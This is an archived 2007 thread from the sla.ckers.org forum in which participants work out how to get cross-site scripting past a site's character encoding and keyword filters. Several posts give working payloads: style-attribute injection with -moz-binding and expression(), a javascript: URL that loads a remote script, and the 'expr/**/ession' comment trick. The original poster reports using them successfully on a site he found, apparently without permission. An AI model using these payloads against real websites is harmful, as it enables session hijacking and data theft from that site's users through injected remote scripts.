Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Escaping the escapes
Posted by: Mephisto
Date: March 01, 2007 09:39PM

I've noticed on some applications I've come across that the site encodes certain characters to prevent xss attacks, so I'm curious if anyone is familar with any vectors that bypass these prevention techniques.

1) when entering a value such as ("><script>alert(xss);</script>) to escape outside the value attribute of a textbox, the site is encoding the double quote, so the html source result becomes.

<input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

2) Another prevention technique I've seen is the encoding of the < sign, so that when a script tag is entered it becomes.

&lt;script>alert(xss);&lt/script>

anyone come across bypassing these types of prevention techniques?

Options: ReplyQuote
Re: Escaping the escapes
Date: March 01, 2007 10:24PM

I've been wondering myself as I tend to run in to places that filter all non-alphanumeric characters into HTML equivalents, and completely strip any string containing "java", or "script".


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Escaping the escapes
Posted by: blad3
Date: March 02, 2007 01:09AM

Mephisto, there is no way you could escape 1).
Same for 2) but I'm not 100% sure. The human imagination is an amazing thing:P



Edited 1 time(s). Last edit at 03/02/2007 01:10AM by blad3.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: teracci
Date: March 02, 2007 01:15AM

Hi Mephisto,

> <input type="text" name="a" value="&quot;><script>alert(xss);</script>" size="30" maxlength="255" />

If the application has character encoding problem, you can use malformed US-ASCII or UTF-7 or something to bypass the filter.

US-ASCII: http://ha.ckers.org/blog/20060621/malformed-ascii-bypasses-filters/
UTF-7: http://sla.ckers.org/forum/read.php?3,3109

Otherwise, I think there is no way to bypass it.



Edited 1 time(s). Last edit at 03/02/2007 01:18AM by teracci.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 02, 2007 06:04AM

Mephisto, 2) is pretty common and just as commonly they forget to escape the quotes. So if you are already inside a tag you can add the style attribute with -moz-binding (for Gecko browsers) and expression (for IE). E.g. you give the page /" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)/ you get:

<input name="text" value="" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)">

Often you also see that double quotes are escaped but the page actually uses single quotes for the attribute - which is just as vulnerable.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 02, 2007 05:09PM

I was able to enter something like this to get it to work (" style="x:expression(alert(1))")

I've been testing various style properties, but haven't found one that would actually allow you to include a .js file or image that contains malicious code...anyone done this before? I've tried the "url" ones, behavior, etc...

Options: ReplyQuote
Re: Escaping the escapes
Posted by: teracci
Date: March 02, 2007 08:26PM

style="background:url(javascript:document.body.appendChild(document.createElement('script')).src='http://hostname/foo.js')"

How is it?

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 02, 2007 10:11PM

Most excellent, thanks teracci!

Options: ReplyQuote
Re: Escaping the escapes
Posted by: rsnake
Date: March 06, 2007 04:50PM

And funny enough I just said the same thing on another post (it may also be vulnerable to variable width encoding): http://ha.ckers.org/blog/20060817/variable-width-encoding/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 05:31PM

okay, found a site where I can put in "</span>" and anything else like that (</div>, </body>, </html>, etc...), but it won't allow the start tags (<span>, <div>, <body>, <html>, etc...) Anyone know of a way around this??

It appears to filter anything that is < and any Aa-Zz character after that.

Update: I can also put in stuff like "< body>", "document.location", "javascript", but it errors on "javascript:"



Edited 3 time(s). Last edit at 03/17/2007 05:39PM by Mephisto.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 06:31PM

How about <<body>? If they use regexps they could easily make this mistake.

Edit: This is http://ha.ckers.org/xss.html#XSS_Extraneous%20open%20brackets btw.



Edited 1 time(s). Last edit at 03/17/2007 06:33PM by trev.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: hasse
Date: March 17, 2007 06:31PM

Mephisto Wrote:
-------------------------------------------------------
> okay, found a site where I can put in "" and
> anything else like that (, , , etc...), but it
> won't allow the start tags (, , , , etc...) Anyone
> know of a way around this??
>
> It appears to filter anything that is < and any
> Aa-Zz character after that.
>
> Update: I can also put in stuff like "< body>",
> "document.location", "javascript", but it errors
> on "javascript:"

Is it inside a tag from the beginning?

trev Wrote:
-------------------------------------------------------
> How about <<body> If they use regexps they could easily
> make this mistake.

But shouldn't it catch the <<body> part?



Edited 1 time(s). Last edit at 03/17/2007 06:32PM by hasse.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 06:39PM

This seems to work in Firefox:

<\asdf style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)"> - sorry, doesn't really work.

@hasse: Because it might check "<<" and then continue with "bo".



Edited 1 time(s). Last edit at 03/17/2007 06:41PM by trev.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 08:23PM

@trev - <<body> doesn't work either.

@hasse - The echoed input is placed within a <span></span> tag...

So it looks like this when echoed

<span>Input Here</span>

by inputing "</span>" I can close the span tag, but I can't seem to do much of anything useful with it, like inject another (starting) html tag.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 17, 2007 09:00PM

I run a test and no browser allows you to put anything between < and the starting letter of the tag. So you cannot start a tag and without it this hole is harmless. That is, unless you manage to change the encoding of this page (see UTF-7 vector).

Options: ReplyQuote
Re: Escaping the escapes
Posted by: teracci
Date: March 17, 2007 09:27PM

> It appears to filter anything that is < and any Aa-Zz character after that.

If so, try using NULL character.

<span><[0x00]script>alert()</script></span>

# IE completely ignores NULL chars.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 17, 2007 10:35PM

@trev - the Accept-Charset header is "ISO-8859-1,utf-8;q=0.7,*;q=0.7", since it's defined as utf-8 I'm not sure I can set it to utf-7.

@teracci - the 0x00 null byte didn't work, it just rendered as part of the text. I tried the url encoded null byte version (%00) on another page and it actually caught it and threw an error.

It would appear I can't do much of anything with the type of filtering they have in place.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 06:31AM

Mephisto, the important thing is not the Accept-Charset you are sending but Content-Type the server sends you. And sometimes it can be manipulated through URL parameters.

teracci, see above - I already tried the null byte and the other 65535 char codes as well. It might be that IE ignores it inside the tag name but it certainly doesn't want to have it between the opening bracket and the name.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Hong
Date: March 18, 2007 11:10AM

How about style inside </a>?
</a style="xx:expression(alert('xss'))">

- Hong

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 11:46AM

IE accepts attributes on closing tags?????? That's crazy...

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 02:12PM

@trev - The content type is "text/html; charset=utf-8"

@Hong - It appears to filter "expression" as well.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 02:17PM

Try http://ha.ckers.org/xss.html#XSS_DIV_background_image_unicode

Options: ReplyQuote
Re: Escaping the escapes
Posted by: rsnake
Date: March 18, 2007 04:02PM

It filters "expression" but does it filter expr/**/ession ?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 08:08PM

@rsnake - you are my HERO! that worked perfectly.

Now the next task is to try and include a remote script.

I tried this, but it didn't work...

</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://mydomain/s.js')">

Options: ReplyQuote
Re: Escaping the escapes
Posted by: trev
Date: March 18, 2007 08:53PM

Find out which keyword it is blocking (probably "script") and use the same trick with /**/ again. Or write 'scr'+'ipt'.

Options: ReplyQuote
Re: Escaping the escapes
Posted by: rsnake
Date: March 18, 2007 08:58PM

You also have two double quotes there, might want to remove those, unless that was just a typo here.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Escaping the escapes
Posted by: Mephisto
Date: March 18, 2007 09:33PM

Yep, I jumped the gun on it...just had to remove the additional double quote and it worked fine...thanks guys!

Options: ReplyQuote
Re: Escaping the escapes
Posted by: hackathology
Date: March 27, 2007 12:46AM

Rsnake, i tried that and it works. You r right Mephisto, u just hae to remove the additional double quotes.

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.